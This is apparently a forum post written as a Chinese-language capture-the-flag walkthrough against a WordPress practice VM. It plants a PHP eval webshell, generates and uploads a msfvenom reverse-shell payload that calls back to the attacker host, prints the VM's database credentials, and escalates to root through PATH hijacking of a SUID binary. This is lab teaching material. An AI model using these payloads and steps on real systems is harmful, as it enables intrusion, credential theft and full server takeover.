  14. | Confirmed By: Css Style In 404 Page (Passive Detection)
  15. |
  16. | Version: 2.3 (80% confidence)
  17. | Found By: Style (Passive Detection)
  18. | - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

额……..好像没有扫描出php文件,难道是禁了???

尝试访问一下(我们之前编辑的文件)

  1. http://192.168.83.145/wp-content/themes/twentyseventeen/comments.php

访问失败

 

1.2 分析

但是转念一想,我们刚刚是对主题进行了编辑,而主题是在页面上显示的,然后我们编辑的是comments界面

那么我们何不到前台界面去看看是否有效果,而且comments.php,看样子是交流

那么就很有可能是留言板块

又文章底下存在留言板块!!!!

那么!!!!!GO~GO~GO,去看看

结果:在文章界面发现!!!

shell

 

1.3 getshell

使用工具连接我们写的木马

这里我使用的是蚁剑

失败

结果发现这都是什么数据啊!!

应该是连接失败了

那么就需要重新来过了!

 

2. 插件编辑

2.1 写马

同样,找到插件编辑模块,选择应该插件进行编辑

写入一句话木马

  1. <?php eval($_REQUEST[1]);?>

写马

然后点击更新保存即可

2.2 进行访问

该文件是hello.php

那么我们尝试访问一下看看

  1. http://sunset-midnight/hello.php

发现

哦豁

OOPS! THAT PAGE CAN’T BE FOUND.

不要急

我们试着传参看看

  1. http://sunset-midnight/hello.php?1=phpinfo();

哇哦

哇哦!!!!!

貌似成功了

那么接下来

2.3 getshell

使用工具-蚁剑

添加数据

  1. url地址:http://sunset-midnight/hello.php (写马地址)
  2. 连接密码:1 (我们之前设置的参数)

连接

测试连接成功,那么我们添加然后打开看看

发现

成功

成功连接!!!

成功getshell!!!!

 

3. 修改管理员数据

3.1 原来用户数据

这时我们就可以将管理员的密码给还原了

用户原来数据

  1. 用户:admin
  2. 密码:$P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/

那么我们登录数据库,然后更新

3.2 更新用户数据
  1. MariaDB [wordpress_db]> update wp_users set user_pass='$P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/' where user_login='admin';
  2. Query OK, 1 row affected (0.002 sec)
  3. Rows matched: 1 Changed: 1 Warnings: 0

更新完成

那么我们看看是否更改了

更新

发现于原数据一样,打完收工!

 

7. getshell-反弹shell

前面getshell成功的话可以直接看第8步

1. 制作反弹shell

1.1 搜索payloads

开启msf

  1. root@For-Fun:~# msfconsole
  2. IIIIII dTb.dTb _.---._
  3. II 4' v 'B .'"".'/|\`.""'.
  4. II 6. .P : .' / | \ `. :
  5. II 'T;. .;P' '.' / | \ `.'
  6. II 'T; ;P' `. / | \ .'
  7. IIIIII 'YvP' `-.__|__.-'
  8. I love shells --egypt
  9. =[ metasploit v5.0.101-dev ]
  10. + -- --=[ 2048 exploits - 1105 auxiliary - 344 post ]
  11. + -- --=[ 562 payloads - 45 encoders - 10 nops ]
  12. + -- --=[ 7 evasion ]
  13. Metasploit tip: You can use help to view all available commands
  14. msf5 >

显示payloads

  1. msf5 > show payloads
  2. .......
  3. 289 php/bind_perl manual No PHP Command Shell, Bind TCP (via Perl)
  4. 290 php/bind_perl_ipv6 manual No PHP Command Shell, Bind TCP (via perl) IPv6
  5. 291 php/bind_php manual No PHP Command Shell, Bind TCP (via PHP)
  6. 292 php/bind_php_ipv6 manual No PHP Command Shell, Bind TCP (via php) IPv6
  7. 293 php/download_exec manual No PHP Executable Download and Execute
  8. 294 php/exec manual No PHP Execute Command
  9. 295 php/meterpreter/bind_tcp manual No PHP Meterpreter, Bind TCP Stager
  10. 296 php/meterpreter/bind_tcp_ipv6 manual No PHP Meterpreter, Bind TCP Stager IPv6
  11. 297 php/meterpreter/bind_tcp_ipv6_uuid manual No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
  12. 298 php/meterpreter/bind_tcp_uuid manual No PHP Meterpreter, Bind TCP Stager with UUID Support
  13. 299 php/meterpreter/reverse_tcp manual No PHP Meterpreter, PHP Reverse TCP Stager
  14. 300 php/meterpreter/reverse_tcp_uuid manual No PHP Meterpreter, PHP Reverse TCP Stager
  15. 301 php/meterpreter_reverse_tcp manual No PHP Meterpreter, Reverse TCP Inline
  16. 302 php/reverse_perl manual No PHP Command, Double Reverse TCP Connection (via Perl)
  17. 303 php/reverse_php manual No PHP Command Shell, Reverse TCP (via PHP)
  18. 304 php/shell_findsock manual No PHP Command Shell, Find Sock
  19. ......

里面东西多,但是按序排列,找起来比较容易

我们要找的是php编写的,反弹shell

  1. 299 php/meterpreter/reverse_tcp manual No PHP Meterpreter, PHP Reverse TCP Stager

 

1.2 查看配置

使用该payload,查看配置

  1. msf5 > use php/meterpreter/reverse_tcp
  2. msf5 payload(php/meterpreter/reverse_tcp) > options
  3. Module options (payload/php/meterpreter/reverse_tcp):
  4. Name Current Setting Required Description
  5. ---- --------------- -------- -----------
  6. LHOST yes The listen address (an interface may be specified)
  7. LPORT 4444 yes The listen port
  8. msf5 payload(php/meterpreter/reverse_tcp) >

发现需要我们配置lhost和lport,即

  1. lhost:攻击机
  2. lport:端口(任意设置)

 

1.3 shell生成

使用msfvenom:生成木马文件

  1. root@For-Fun:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.83.140 lport=8888 -o shell.php
  2. [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
  3. [-] No arch selected, selecting arch: php from the payload
  4. No encoder specified, outputting raw payload
  5. Payload size: 1115 bytes
  6. Saved as: shell.php
  • msfvenom:工具
  • -p:指定payload
  • lhost:攻击机IP
  • lport:监听端口
  • -o:写入文件

生成

既然制作完成了,那么我们可以上传,或者将其代码复制,然后粘贴到可编辑文本中

我们先要开启监听

 

1.4 开启监听

使用监听模块exploit/multi/handler

  1. msf5 > use exploit/multi/handler
  2. [*] Using configured payload generic/shell_reverse_tcp
  3. msf5 exploit(multi/handler) >

设置payload

  1. msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
  2. payload => php/meterpreter/reverse_tcp

查看配置

  1. msf5 exploit(multi/handler) > options
  2. Module options (exploit/multi/handler):
  3. Name Current Setting Required Description
  4. ---- --------------- -------- -----------
  5. Payload options (php/meterpreter/reverse_tcp):
  6. Name Current Setting Required Description
  7. ---- --------------- -------- -----------
  8. LHOST yes The listen address (an interface may be specified)
  9. LPORT 4444 yes The listen port
  10. Exploit target:
  11. Id Name
  12. -- ----
  13. 0 Wildcard Target
  14. msf5 exploit(multi/handler) >

配置与我们之前的配置要一致,不然无法监听

  1. msf5 exploit(multi/handler) > options
  2. Module options (exploit/multi/handler):
  3. Name Current Setting Required Description
  4. ---- --------------- -------- -----------
  5. Payload options (php/meterpreter/reverse_tcp):
  6. Name Current Setting Required Description
  7. ---- --------------- -------- -----------
  8. LHOST 192.168.83.140 yes The listen address (an interface may be specified)
  9. LPORT 8888 yes The listen port
  10. Exploit target:
  11. Id Name
  12. -- ----
  13. 0 Wildcard Target
  14. msf5 exploit(multi/handler) >

使用

  1. msf5 exploit(multi/handler) > exploit
  2. [*] Started reverse TCP handler on 192.168.83.140:8888

 

2. 文件上传

2.1 修改管理数据

同样我们直接修改管理员数据,之后改回,这里就直接跳过了,和上面步骤一样的

2.2 文件上传

浏览后台发现可以上传主题,那么我们试着上传我们的木马看看

发现

上传失败了

应该是做了拦截或者什么的

发现是需要上传一个压缩包

2.3 文件上传之第二版

尝试压缩后的文件

结果发现,压缩后缀又存在限制,改为zip然后上传

发现

限制

算了,还是老老实实的从官网下载文件,然后放入我们的木马吧

2.4 文件上传之最终版!

下载完打开压缩包,放入木马文件

放入

ok放好了,那么开始上传!!!

结果…….

这.....

说我们上传的文件过大…….

行,你厉害

我去下载下文件行了吧!!!!

2.5 文件上传之真*最终版!

下载小文件,然后放入我们的shell

小的

再次上传看看

上传

上传成功!!!!

终于!!

 

3. 访问文件

我们去访问我们上传的文件shell.php

  1. http://192.168.83.145/wp-content/themes/hemila/shell.php
  • 上传的主题:hemila
  • 文件:shell.php

发现

getshell

反弹成功!!!!

 

4. getshell

看是否getshell成功

  1. meterpreter > shell
  2. Process 7962 created.
  3. Channel 1 created.

咦,貌似成功了

显示目录信息看看

  1. python -c 'import pty;pty.spawn("/bin/bash")'
  2. www-data@midnight:/var/www/html/wordpress/wp-content/themes/hemila$

ok

显示成功!!!

getshell!!

 

5. 还原用户数据

还原用户的密码

步骤同上

 

8. 提权

接第七步:反弹shell

第六步之后的操作与此差不多,只是使用工具去连接,然后剩下的操作差不多

1. 查看权限

我们去看看当前用户

  1. www-data@midnight:/var/www/html/wordpress/wp-content/themes/hemila$ whoami
  2. whoami
  3. www-data

发现

www-data

www-data用户(nginx默认用户 组),低权限

那么我们需要想办法去提权了

2. 查看用户

去看看有哪些用户

  1. www-data@midnight:/var/www/html/wordpress/wp-content/themes/hemila$ cat /etc/passwd

用户

  1. root:x:0:0:root:/root:/bin/bash
  2. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  3. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  4. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  5. sync:x:4:65534:sync:/bin:/bin/sync
  6. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  7. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  8. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  9. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  10. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  11. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  12. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  13. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  14. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  15. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  16. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  17. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  18. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  19. _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
  20. systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
  21. systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
  22. systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
  23. messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
  24. avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
  25. jose:x:1000:1000:jose,,,:/home/jose:/bin/bash
  26. systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
  27. sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
  28. mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false

发现(1000是新建用户标识)

  1. root:x:0:0:root:/root:/bin/bash
  2. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  3. jose:x:1000:1000:jose,,,:/home/jose:/bin/bash

发现存在应该jose用户

3. 尝试全局搜索jose

全局搜索一下,看看是否能搜索到关于jose的有用信息

  1. www-data@midnight:/var/www$ grep -r "jose" ./
  2. grep -r "jose" ./
  3. ./html/wordpress/wp-config.php:define( 'DB_USER', 'jose' );
  4. ./html/wordpress/wp-content/plugins/akismet/readme.txt:Contributors: matt, ryan, andy, mdawaffe, tellyworth, josephscott, lessbloat, eoigal, cfinke, automattic, jgs, procifer, stephdau

哦~,发现了

  1. ./html/wordpress/wp-config.php:define( 'DB_USER', 'jose' );

在wp-config.php文件中,那么我们去看看是否存在别的信息

  1. www-data@midnight:/var/www$ cat ./html/wordpress/wp-config.php
  2. cat ./html/wordpress/wp-config.php
  1. <?php
  2. /**
  3. * The base configuration for WordPress
  4. *
  5. * The wp-config.php creation script uses this file during the
  6. * installation. You don't have to use the web site, you can
  7. * copy this file to "wp-config.php" and fill in the values.
  8. *
  9. * This file contains the following configurations:
  10. *
  11. * * MySQL settings
  12. * * Secret keys
  13. * * Database table prefix
  14. * * ABSPATH
  15. *
  16. * @link https://wordpress.org/support/article/editing-wp-config-php/
  17. *
  18. * @package WordPress
  19. */
  20. // ** MySQL settings - You can get this info from your web host ** //
  21. /** The name of the database for WordPress */
  22. define( 'DB_NAME', 'wordpress_db' );
  23. /** MySQL database username */
  24. define( 'DB_USER', 'jose' );
  25. /** MySQL database password */
  26. define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );
  27. /** MySQL hostname */
  28. define( 'DB_HOST', 'localhost' );
  29. /** Database Charset to use in creating database tables. */
  30. define( 'DB_CHARSET', 'utf8' );
  31. /** The Database Collate type. Don't change this if in doubt. */
  32. define( 'DB_COLLATE', '' );
  33. /**#@+
  34. * Authentication Unique Keys and Salts.
  35. *
  36. * Change these to different unique phrases!
  37. * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
  38. * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
  39. *
  40. * @since 2.6.0
  41. */
  42. define('AUTH_KEY', '9F#)Pk/=&SyQ/>UVRBXx$}e&>G@(+m6L|_{Emur&fv&fO_+wbJ`-6QnE_7hI|Y<p');
  43. define('SECURE_AUTH_KEY', 'p#Eh5#4W~p4-Iue2M)H/?[dp`BS;$7o~Kb%F?&S-Zv=rH#;U%`9G#VR`l^,8j$M+');
  44. define('LOGGED_IN_KEY', '0{YUw?X%j+ej-0du&FW@QkVP?b(#QsQfu[Q%<QS_Lpc1UI1|st:EJr)d*$g/iJ18');
  45. define('NONCE_KEY', '%)thH*l;)A^S#8WQ!8TKAnQ;uNXNKv<f.|PyYijgztda70y-4m~DTyqr^X!$JwX#');
  46. define('AUTH_SALT', '<Kd5.3^|yo:/fw2Y|PTb4!bU~5uRv7Z(n0;~jOXoO7MC]j/ICu[tY!)g4Oah-{oa');
  47. define('SECURE_AUTH_SALT', 'dmYQvQ1Ap&z~JUHUaKR6]<rm7^ydGAp(/EH&+vrAi6cBpi?F7XKTc@Ahm:|h*wR;');
  48. define('LOGGED_IN_SALT', '5+Iw-;-j+2rD3WgRtSM`!zDb5I%LLU0]Awk-Cma:f4xrJv%k~/@+TthXY_[JpjfK');
  49. define('NONCE_SALT', 'iDo3}y9z;@c~a)ZLT:7|.ZCp-0sK4>T1p&%MhGt_TUu+HFpPjn-no`:8sI0BA);y');
  50. /**#@-*/
  51. /**
  52. * WordPress Database Table prefix.
  53. *
  54. * You can have multiple installations in one database if you give each
  55. * a unique prefix. Only numbers, letters, and underscores please!
  56. */
  57. $table_prefix = 'wp_';
  58. /**
  59. * For developers: WordPress debugging mode.
  60. *
  61. * Change this to true to enable the display of notices during development.
  62. * It is strongly recommended that plugin and theme developers use WP_DEBUG
  63. * in their development environments.
  64. *
  65. * For information on other constants that can be used for debugging,
  66. * visit the documentation.
  67. *
  68. * @link https://wordpress.org/support/article/debugging-in-wordpress/
  69. */
  70. define( 'WP_DEBUG', false );
  71. /* That's all, stop editing! Happy publishing. */
  72. /** Absolute path to the WordPress directory. */
  73. if ( ! defined( 'ABSPATH' ) ) {
  74. define( 'ABSPATH', __DIR__ . '/' );
  75. }
  76. /** Sets up WordPress vars and included files. */
  77. require_once ABSPATH . 'wp-settings.php';

咦发现了

jose

4. 数据解密

  1. /** MySQL database username */
  2. 'DB_USER':'jose' );
  3. /** MySQL database password */
  4. 'DB_PASSWORD':'645dc5a8871d2a4269d4cbe23f6ae103' );

密码32位,可能进行了md5加密(当然也有可能没加密)

尝试解密看看能否解开

结果

失败

这………

那么我们尝试直接切换用户看看

5. 切换用户

  • 用户:jose
  • 密码:645dc5a8871d2a4269d4cbe23f6ae103
  1. www-data@midnight:/var/www$ su jose

成功

好吧,还真没加密,直接明文,害~

尝试使用sudo提权看看

  1. jose@midnight:/var/www$ sudo su

失败

jose用户没有这个权限

那么只能想别的办法提权了

那么接着去看看suid,或许会有收获

6. 查看sudi权限的文件

suid全称是Set owner User ID up on execution。这是Linux给可执行文件的一个属性

  • find : 查找文件
  • / :从根目录开始
  • perm :详细查找
  • -u=s :suid文件
  • -type f :文件类型为普通文件
  • 2>/dev/null :错误输出不显示,直接丢到/dev/null文件中
  1. jose@midnight:/var/www$ find / -perm -u=s -type f 2>/dev/null
  2. find / -perm -u=s -type f 2>/dev/null

查找文件

然后发现存在一个比较特别的文件

  1. /usr/bin/status

7. status

尝试运行一下

  1. www-data@midnight:/var/www$ status

发现

status

那么是否可以利用呢?

搜索发现可以利用环境变量来提权

8. 环境变量

即更改$PATH文件

1. 查看环境变量
  1. jose@midnight:/var/www$ echo $PATH
  2. echo $PATH
  3. /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

由于status使用了service命令,那么我们可以尝试将其加入环境变量中,从而执行

但是当我们没有权限无法创建文件的时候怎么办??

去tmp文件夹下即可(存放临时文件)

2. 创建service文件

换位置

  1. jose@midnight:/var/www$ cd /tmp
  2. cd /tmp
  3. jose@midnight:/tmp$

创建文件

  1. jose@midnight:/tmp$ echo "/bin/bash" > service
  2. echo "/bin/bash" > service
  3. jose@midnight:/tmp$ ls
  4. ls
  5. service
  6. jose@midnight:/tmp$ cat service
  7. cat service
  8. /bin/bash
  9. jose@midnight:/tmp$

ok创建成功

赋予权限(读写权限),直接777

  1. jose@midnight:/tmp$ chmod 777 ./service
  2. chmod 777 ./service
  3. jose@midnight:/tmp$
3. 添加进环境变量
  1. jose@midnight:/tmp$ export PATH=/tmp:$PATH
  2. export PATH=/tmp:$PATH
  3. jose@midnight:/tmp$

好像添加成功了,我们来看看

  1. jose@midnight:/tmp$ echo $PATH
  2. echo $PATH
  3. /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

我们尝试运行一下脚本

9. 运行

运行status

  1. jose@midnight:/tmp$ status

发现

root

root!!!!
看看当前用户

  1. root@midnight:/tmp# whoami

root

成功!!!!

打完收工!!!!

用户名金币积分时间理由
奖励系统 50.00 0 2020-09-05 20:08:43 投稿满 5 赞奖励
Track-聂风 70.00 0 2020-09-03 14:02:03 加油~支持同学

打赏我,让我更有动力~

0 条回复   |  直到 2020-9-2 | 1372 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.